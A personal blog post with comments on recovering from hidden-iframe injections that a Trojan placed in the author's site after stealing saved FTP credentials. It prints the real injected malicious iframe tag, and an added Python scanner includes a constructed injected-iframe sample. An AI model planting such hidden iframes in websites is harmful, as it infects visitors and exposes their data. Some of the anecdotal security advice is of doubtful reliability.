How to solve an iframe injection caused by Trojan malware
What is <IFRAME>?
The <iframe> tag defines an inline frame that contains another document. We use the <iframe> tag to include another document inside a website document.
For example, I use the following iframe code to insert syndicated Salesforce.com content into my website. Please refer to the image below.
<iframe id="blockrandom"
name="iframe" src="http://probyte2u.com/salesforce.html"
width="100%"
height="1300"
scrolling="auto"
align="top"
frameborder="0"
class="wrapper">
This option will not work correctly. Unfortunately, your browser does not support inline frames.
</iframe>
By now you have a rough idea of <IFRAME> and its usage!
Now, what does IFRAME injection mean?
Iframe injection means attackers or hackers insert their iframe code inside your website's pages. They use Trojan malware to do it.
Normally they will target your index.html, index.php, default.php or configuration.php page.
They insert their code into your website so that, when visitors open your page, the attackers' malicious code is downloaded onto the visitors' own computers, in order to replicate the process and to retrieve the visitors' financial and identification details.
Their main purpose is financial gain, and some of them do it for political purposes. They can also infect a lot of PCs and use them to launch Distributed Denial of Service (DDoS) attacks against their targets.
From my own personal experience, I first encountered this problem when I tried to access my website and got the following error.
Parse error: syntax error, unexpected '/' in /home/+++++/public_html/index.php on line 85
So I checked in the index.php file and found the following code inserted inside the index.php file.
The iframe injection was not done properly: it had an additional "/" symbol at the start, as shown below. Because of that it was detected, and the website code did not download the malicious code.
/
<iframe src="http://{URL HAS BEEN REMOVED}.cn:8080/ts/in.cgi?pepsi49" width=125 height=125 style="visibility: hidden"></iframe>
If the iframe injection had been done properly, all the visitors to the infected site would most probably have been infected with malware.
Sample of Mozilla Warning for Reported Attack Site shown below.
So what I did was remove the iframe injection from the infected file and upload the new files. Plus, I changed the FTP details for the website.
My site was safe for a few days; unfortunately, the same problem occurred again after a while. I was suspicious about how the hacker was able to access my website.
So I checked with my hosting provider how my website was hacked.
Only then did I learn that my personal computer was most probably infected by a Trojan virus and that the hacker had automated the whole process.
The Trojan virus managed to steal all my websites' usernames and passwords that were saved in the file transfer protocol software that I used. All the websites that I accessed using the FTP software were infected with the iframe injection.
Luckily, I had backup files for my website that were not infected.
Since a lot of the files had been infected, I had no other choice but to restore the entire site using the backup files. I changed my FTP username and password.
To prevent the problem from recurring I installed Kaspersky Internet Security, but the problem still came back. (See my latest update below.)
I still have not figured out the root cause, so the potential for it to happen again is there!
If your problem is not as serious as mine, you could resolve it using the steps below.
How to eliminate this problem
Use the paid version of Kaspersky Antivirus, update the pattern and scan your computer. Clean all infected files on your computer.
How to clean the infected php or html pages in my web site?
1. Refer to a Google badware notice like this
Approximately 6 files have been injected. You can search your index.php and index.html for the injected lines of code.
You can also download a copy of your public_html if there are too many injected files (zip the whole public_html, or zip it folder by folder). Uncompress the zip file on your desktop. Kaspersky will notify you of the injected files. Do not clean the files. Just save the log file so you can edit them manually. Using this method, your pages will not be destroyed or altered by Kaspersky.
2. Change your FTP/Cpanel Login information. Avoid using the same password for web registration. Your FTP password should not be recycled. Some fake web sites would harvest this information and perform iframe injection over the web.
3. Sort your files by date in the FTP window. You can check the most recently edited pages (or the infection date) for injected code.
4. You can revert to public_html backup – this method is not advisable and should be used as last resort if you could not find the infected pages. If your pages have been infected for more than a month, most probably your backup files also contain the injected codes.
5. Also, remember NOT to save the username and password of your website inside your file transfer protocol software. From my own experience, the Trojan virus managed to steal the information from the FTP software.
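The search described in steps 1 and 3, as an added example (not code from the original article): a Python script that walks a downloaded copy of public_html, flags iframes that are hidden or that point at a host outside an allow-list, and lists the most recently modified files first. The function names, the allow-list and the sample markup are assumptions made for illustration.

```python
import os
import re
import sys

SCAN_EXT = (".php", ".html", ".htm")   # page types the article says get targeted
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
HOST_RE = re.compile(r"""\bsrc\s*=\s*["']?(?:https?:)?//([^/"'\s>:?#]+)""", re.I)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
ZERO_RE = re.compile(r"""\b(?:width|height)\s*=\s*["']?[01]\b(?!%)""", re.I)

def suspicious_iframes(text, trusted_hosts=()):
    """Return [(line_no, tag, reasons)] for iframes that look injected."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag, reasons = m.group(0), []
        if HIDDEN_RE.search(tag) or ZERO_RE.search(tag):
            reasons.append("hidden")   # frame the visitor cannot see
        src = HOST_RE.search(tag)      # relative src values have no host
        if src and src.group(1).lower() not in trusted_hosts:
            reasons.append("untrusted host " + src.group(1).lower())
        if reasons:
            hits.append((text.count("\n", 0, m.start()) + 1, tag, reasons))
    return hits

def scan_tree(root, trusted_hosts=()):
    """Scan a local copy of public_html; newest-modified files come first."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXT):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = suspicious_iframes(fh.read(), trusted_hosts)
                if hits:
                    findings.append((os.path.getmtime(path), path, hits))
    return sorted(findings, reverse=True)

# Constructed sample: a legitimate embed followed by an injected hidden frame.
SAMPLE = ('<iframe src="http://probyte2u.com/salesforce.html" width="100%"></iframe>\n'
          '<?php echo $footer; ?>\n'
          '<iframe src="http://injected.example:8080/in.cgi?x" width=125 height=125 '
          'style="visibility: hidden"></iframe>\n')

if __name__ == "__main__":             # usage: python scan.py ./public_html_copy
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for _mtime, path, hits in scan_tree(root, {"probyte2u.com"}):
        for line_no, tag, reasons in hits:
            print(f"{path}:{line_no}: {', '.join(reasons)}: {tag}")
```

Run it against the unzipped local copy rather than the live site, and put every host you deliberately embed in the allow-list so that only unexpected frames are reported.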
Latest Update
They have injected my site again! (Happened in July 2009)
The problem started when I accessed my site to upload a file. Before that, there was no problem.
Looks like I need to iron out the loopholes.
Managed to get my sites back!
I am not very sure how they did it!
But I have taken some precautionary measures to prevent it from happening again!
- I always back up my website content, even before there was any problem. I would recommend you to do so. If your files got infected, you can solve your problem very fast.
- Always change your cpanel / ftp password after you have uploaded your content to your site.
- Don't simply upload content via FTP, because my problem always starts when I FTP the content.
- Don't keep your password and username in your FTP software.
- Always scan your PC with a paid antivirus to detect any virus.
- I am using the Google Chrome incognito web browser to access my cPanel and FTP. I am not sure whether this can solve it or not; let me check and see whether it works.
- Don't install a lot of unnecessary plugins / modules / components in your content management system website; it takes a lot of effort to clean up. I am waiting for the latest update to clean up all the corrupted files.
- I asked Kaspersky Lab Support to analyze my personal computer details to check whether any virus still resides on my PC. Luckily they didn't find any trace of a virus. Please refer to the link below for the correspondence between me and Kaspersky Lab.
- Kaspersky Lab Technical Support Service to Help Detect Virus and Trojan
Still safe till now; it's been more than 1 month since writing this article. Hopefully the problem will not recur!
Thank you Dan for your information and lead. You point out another way to resolve the problem.
Thank you Dan, I am facing the same problem also.
Thanks very much for your history and help for those of us who suffer the same problem. I'm now doing some of the points you describe and I hope this can help my site.
thanks
Saving passwords usually has nothing to do with stealing. The Trojan scans FTP connections and steals passwords from them. It does not matter if you saved it or typed it in. Some trojans even log the keyboard to steal typed passwords.
What you actually have to do is find and remove the trojan itself, which is hard to do.
HijackThis and Malwarebytes' Anti-Malware may help.
Hi Pedja, thank you for stopping by and for the comment.
But in my infection, the trojan got the password from the FTP software which I use.
There were a few sites which I had not accessed for a few months using the FTP software. I didn't initiate any FTP connections for those sites.
I kept the usernames and passwords of the sites in the FTP software.
And this variant managed to get the usernames and passwords from the FTP software and started injecting the iframe code into the sites.
The trojan writer really knows the loopholes to do it. I must admit it was quite brilliantly done.
Once my PC got infected, I noticed my Internet traffic and CPU usage were always high. This is the first symptom of the infection.
Dave comments
"I have the same problems and have to sort it out now.
I have also read elsewhere that ftp passwords are not secure in ftp software so I won't be storing them in my ftp client anymore."
Hi Dave,
I have removed your website link because your site has a virus infection. My Kaspersky just alerted me to the problem.
Thanks for your post.
The same issue for my websites.
If you’re on a VPS/dedicated hosting grab yourself a copy of Upload Guardian - http://www.serverprogress.com/upload_guardian.php It scans for iframe injections and other malicious tools hackers use to modify your pages. The scanning is done on file in real-time via FTP/PHP and will block the attacker at the firewall and can send email alerts.
Hi Steve, thanks for the information. Very useful solution for web hosting company.
Dan says:
4 months ago
URL below provides a solution to this trojan
http://www.qualitycodes.com/tutorial.php?articleid